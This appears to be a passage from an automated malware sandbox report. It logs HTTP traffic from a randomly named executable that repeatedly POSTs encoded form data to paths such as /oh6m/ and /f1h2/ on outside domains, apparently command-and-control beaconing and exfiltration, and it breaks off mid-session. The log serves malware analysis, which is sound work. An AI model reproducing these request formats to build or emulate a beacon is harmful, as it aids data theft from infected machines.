                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cHRUdIm2s7+8fRhV/we/x5yvmLfQlfVFyj3Xrx2fqxPLubD6RgF1gGt+Gxi2rmV9r7NUgFShV4vvWzBFgo3K0g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:53.954174995 CEST951INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTEzNzA2MGUtNWM2Yy00OTI3LWJlYTctODNhYjQ3M2I0ZGFhIiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          33192.168.2.549748199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:59.169945002 CEST753OUTPOST /oh6m/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Origin: http://www.equi-sen.ca
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.equi-sen.ca/oh6m/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 35 6a 4c 4e 4d 58 62 32 58 74 48 4f 72 6d 55 32 4a 59 54 30 43 52 6e 49 77 53 37 6d 57 4d 64 53 6f 4c 46 6b 38 61 66 2b 37 35 33 39 71 48 77 4c 72 78 73 52 6b 38 34 71 2b 74 6e 78 42 6e 77 7a 57 36 45 4f 6f 66 48 58 69 35 70 46 79 52 65 31 61 6f 73 35 76 66 75 36 79 38 4b 4d 6d 6f 74 6d 37 54 43 35 6d 43 46 51 64 50 61 36 33 31 79 4b 67 70 69 65 4e 2f 76 4d 57 64 65 35 41 4d 74 5a 61 54 6c 49 50 46 54 57 5a 43 57 6c 75 32 76 4b 70 56 66 77 4e 4a 54 67 5a 49 6a 4a 2b 55 69 45 6f 41 4c 4e 67 67 33 62 72 51 5a 6b 76 52 4b 2b 66 2b 32 68 48 4e 49 31 32 74 6f 69 73 4f 6b 67 4a 71 30 77 41 33 67 3d
                                          Data Ascii: 4b34ht=5jLNMXb2XtHOrmU2JYT0CRnIwS7mWMdSoLFk8af+7539qHwLrxsRk84q+tnxBnwzW6EOofHXi5pFyRe1aos5vfu6y8KMmotm7TC5mCFQdPa631yKgpieN/vMWde5AMtZaTlIPFTWZCWlu2vKpVfwNJTgZIjJ+UiEoALNgg3brQZkvRK+f+2hHNI12toisOkgJq0wA3g=
                                          May 27, 2024 12:44:59.665190935 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:59 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1110
                                          x-request-id: 3727262a-6784-456b-9444-550bdfc3befe
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==
                                          set-cookie: parking_session=3727262a-6784-456b-9444-550bdfc3befe; expires=Mon, 27 May 2024 10:59:59 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 39 68 51 2b 61 4f 4b 36 4d 42 36 71 2b 57 6d 69 5a 57 6d 66 75 33 36 42 53 55 68 70 35 43 44 73 69 45 66 41 5a 4d 6d 55 31 47 37 32 55 31 78 39 6c 67 30 61 6e 78 45 73 6c 66 2f 67 35 53 55 65 44 61 56 62 6b 66 47 6f 79 39 33 49 61 78 4f 31 55 51 61 59 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:59.665319920 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzcyNzI2MmEtNjc4NC00NTZiLTk0NDQtNTUwYmRmYzNiZWZlIiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          34192.168.2.549749199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:02.594897032 CEST773OUTPOST /oh6m/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Origin: http://www.equi-sen.ca
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.equi-sen.ca/oh6m/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 35 6a 4c 4e 4d 58 62 32 58 74 48 4f 72 44 63 32 46 5a 54 30 56 42 6e 50 73 69 37 6d 45 4d 64 57 6f 4c 4a 6b 38 65 50 75 38 4b 54 39 72 69 4d 4c 71 7a 45 52 6c 38 34 71 6d 39 6d 35 46 6e 77 34 57 36 4a 35 6f 66 37 58 69 2f 46 46 79 51 75 31 5a 62 30 6d 75 50 75 34 6e 73 4b 4f 69 6f 74 6d 37 54 43 35 6d 47 73 48 64 50 53 36 33 45 43 4b 76 74 57 64 54 50 76 4c 47 4e 65 35 4b 63 74 56 61 54 6c 6d 50 41 32 7a 5a 42 75 6c 75 33 66 4b 70 48 6e 33 47 4a 54 6d 58 6f 69 46 37 57 47 4e 6c 7a 61 44 6d 68 4f 45 33 44 5a 77 6e 48 6e 55 46 63 2b 4a 55 74 6b 4e 6d 2b 67 56 39 2b 46 4a 54 4a 6b 41 65 67 31 6d 68 68 55 79 78 2b 4d 78 2f 46 69 4d 41 2f 6c 36 55 50 66 67
                                          Data Ascii: 4b34ht=5jLNMXb2XtHOrDc2FZT0VBnPsi7mEMdWoLJk8ePu8KT9riMLqzERl84qm9m5Fnw4W6J5of7Xi/FFyQu1Zb0muPu4nsKOiotm7TC5mGsHdPS63ECKvtWdTPvLGNe5KctVaTlmPA2zZBulu3fKpHn3GJTmXoiF7WGNlzaDmhOE3DZwnHnUFc+JUtkNm+gV9+FJTJkAeg1mhhUyx+Mx/FiMA/l6UPfg
                                          May 27, 2024 12:45:03.059113979 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:45:02 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1110
                                          x-request-id: 42bd7d32-af59-4faa-9710-0442a62a3ea5
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==
                                          set-cookie: parking_session=42bd7d32-af59-4faa-9710-0442a62a3ea5; expires=Mon, 27 May 2024 11:00:03 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 39 68 51 2b 61 4f 4b 36 4d 42 36 71 2b 57 6d 69 5a 57 6d 66 75 33 36 42 53 55 68 70 35 43 44 73 69 45 66 41 5a 4d 6d 55 31 47 37 32 55 31 78 39 6c 67 30 61 6e 78 45 73 6c 66 2f 67 35 53 55 65 44 61 56 62 6b 66 47 6f 79 39 33 49 61 78 4f 31 55 51 61 59 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:45:03.059180975 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDJiZDdkMzItYWY1OS00ZmFhLTk3MTAtMDQ0MmE2MmEzZWE1IiwicGFnZV90aW1lIjoxNzE2ODA2Nz


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          35192.168.2.549750199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:05.129842043 CEST1790OUTPOST /oh6m/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Origin: http://www.equi-sen.ca
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.equi-sen.ca/oh6m/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 35 6a 4c 4e 4d 58 62 32 58 74 48 4f 72 44 63 32 46 5a 54 30 56 42 6e 50 73 69 37 6d 45 4d 64 57 6f 4c 4a 6b 38 65 50 75 38 4b 62 39 72 51 30 4c 72 56 4d 52 6a 4d 34 71 76 64 6d 34 46 6e 77 66 57 2b 74 39 6f 66 33 68 69 38 78 46 7a 32 53 31 59 75 59 6d 67 50 75 34 6c 73 4b 4c 6d 6f 74 4a 37 54 53 39 6d 43 49 48 64 50 53 36 33 48 4b 4b 6f 35 69 64 52 50 76 4d 57 64 65 6c 41 4d 73 41 61 54 39 51 50 42 32 4e 61 78 4f 6c 75 58 50 4b 72 79 7a 33 46 70 54 6b 55 6f 6a 59 37 57 37 56 6c 7a 48 79 6d 68 36 69 33 44 68 77 33 53 53 53 55 74 47 4d 47 4e 77 67 68 63 49 44 39 6f 78 77 4e 34 30 42 55 48 4a 6a 74 53 30 4c 6b 34 6b 50 31 42 6e 70 5a 4c 56 61 64 66 2b 6e 35 34 66 7a 5a 49 32 68 58 49 75 4b 79 52 34 4a 31 67 4a 65 5a 43 6d 76 32 61 32 4f 6f 2b 76 5a 65 4d 58 79 74 61 38 41 48 4d 70 78 37 31 46 31 61 73 52 79 46 4b 62 39 74 53 32 48 2f 55 52 48 34 59 6b 47 77 31 72 66 6d 7a 55 66 58 42 41 6b 55 48 78 30 66 36 36 78 56 5a 47 42 6f 67 51 2f 42 4a 73 32 30 71 4a 48 43 49 36 65 58 6c 4c [TRUNCATED]
                                          Data Ascii: 4b34ht=5jLNMXb2XtHOrDc2FZT0VBnPsi7mEMdWoLJk8ePu8Kb9rQ0LrVMRjM4qvdm4FnwfW+t9of3hi8xFz2S1YuYmgPu4lsKLmotJ7TS9mCIHdPS63HKKo5idRPvMWdelAMsAaT9QPB2NaxOluXPKryz3FpTkUojY7W7VlzHymh6i3Dhw3SSSUtGMGNwghcID9oxwN40BUHJjtS0Lk4kP1BnpZLVadf+n54fzZI2hXIuKyR4J1gJeZCmv2a2Oo+vZeMXyta8AHMpx71F1asRyFKb9tS2H/URH4YkGw1rfmzUfXBAkUHx0f66xVZGBogQ/BJs20qJHCI6eXlLjJzCTNtQtzee8yA0ULf1IDrxctPvJTbT4n1uGJ/Y8T8Hp4p7uyEg/1A4xHP6fncj33YcZd62CYDw2YZRo8bglywG1LWEhChO8etWjUS3tQQU/qyS7XJwYHuHAm/9RumIIXSAk5Ur3337D7fgg7e6ZbOiEr4ELM9D5x9E0aBywXNrKbOCQk6NJ4LRuNkg2VZM0Jk4AXYpX5+luELnPtJbLhSNSvMlGfLVNH5QIG4oG6AcjO+HDIx8X8YXkVlH0m3m4bxT4GNdqggHEMTSxQSetm/JHWA2tEmOGJ+yAb4xWaeu7s6KgyKtIvhR9tfsygfoyQ8OE+XsO0ubF4bFU8pf3JhNgEAh9jUe2Qk0R0oDXEMkaLuEhWWb0VN4SEIahinkpG0aDYgF9oFALcditiH56WFI94BSDvkWIHEdh7k+mLoGPzOsDJxOJ5ZPK/GbBJROqT2UQsYj1IfTYwjXzxRuaA0542+zxQHN6xWhzpoaZM/d0JasM4O3VVy3EbwxF54Nc839TG48Y4xZhwhUBqCNt26CCkm2t4aNviMj4Xb89XGkFtyCAYG5vj2Y0lZy7LD3JOEjcdlajjkUdYxm5L9KFCCLRK50LYNZJ8JTiIhRjbLItNrJVqoyyUo/6PvdjwRgH1IAzDcsIw+K+flIHywCNIwBoy78zENlwC [TRUNCATED]
                                          May 27, 2024 12:45:05.627615929 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:45:05 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1110
                                          x-request-id: ada3a555-77c1-4edd-ab87-48a7cc578736
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==
                                          set-cookie: parking_session=ada3a555-77c1-4edd-ab87-48a7cc578736; expires=Mon, 27 May 2024 11:00:05 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 39 68 51 2b 61 4f 4b 36 4d 42 36 71 2b 57 6d 69 5a 57 6d 66 75 33 36 42 53 55 68 70 35 43 44 73 69 45 66 41 5a 4d 6d 55 31 47 37 32 55 31 78 39 6c 67 30 61 6e 78 45 73 6c 66 2f 67 35 53 55 65 44 61 56 62 6b 66 47 6f 79 39 33 49 61 78 4f 31 55 51 61 59 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:45:05.627652884 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWRhM2E1NTUtNzdjMS00ZWRkLWFiODctNDhhN2NjNTc4NzM2IiwicGFnZV90aW1lIjoxNzE2ODA2Nz


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          36192.168.2.549751199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:07.664710999 CEST502OUTGET /oh6m/?4b34ht=0hjtPibzKO3ZkT4WCImxDHrzyGnYBfhDxpd96Njw0Kz+uSoJqw8c1u4CpsfzEVAvZJgLgbHe9v9Z2CW7S5Mmgqq6m67vtrFp6Au24Wk/I93/9XnPpdf/S4Hde+etKMlcYw==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:08.132663012 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:45:07 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1506
                                          x-request-id: b2d32690-d7a5-4215-9d9a-e8f5593b61e1
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pbHeF8xd4CIJ1HM379Yuhz+CGSDxMnjq40GcQfB+Hi2CkPH3vxEYm9FvozTbKeK4drpTNZwVoD+zoZKsHOn0PA==
                                          set-cookie: parking_session=b2d32690-d7a5-4215-9d9a-e8f5593b61e1; expires=Mon, 27 May 2024 11:00:08 GMT; path=/
                                          connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 62 48 65 46 38 78 64 34 43 49 4a 31 48 4d 33 37 39 59 75 68 7a 2b 43 47 53 44 78 4d 6e 6a 71 34 30 47 63 51 66 42 2b 48 69 32 43 6b 50 48 33 76 78 45 59 6d 39 46 76 6f 7a 54 62 4b 65 4b 34 64 72 70 54 4e 5a 77 56 6f 44 2b 7a 6f 5a 4b 73 48 4f 6e 30 50 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pbHeF8xd4CIJ1HM379Yuhz+CGSDxMnjq40GcQfB+Hi2CkPH3vxEYm9FvozTbKeK4drpTNZwVoD+zoZKsHOn0PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:45:08.132683039 CEST959INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjJkMzI2OTAtZDdhNS00MjE1LTlkOWEtZThmNTU5M2I2MWUxIiwicGFnZV90aW1lIjoxNzE2ODA2Nz


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          37192.168.2.549752173.254.28.213806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:13.277862072 CEST774OUTPOST /f1h2/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Origin: http://www.newmediamonday.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.newmediamonday.com/f1h2/
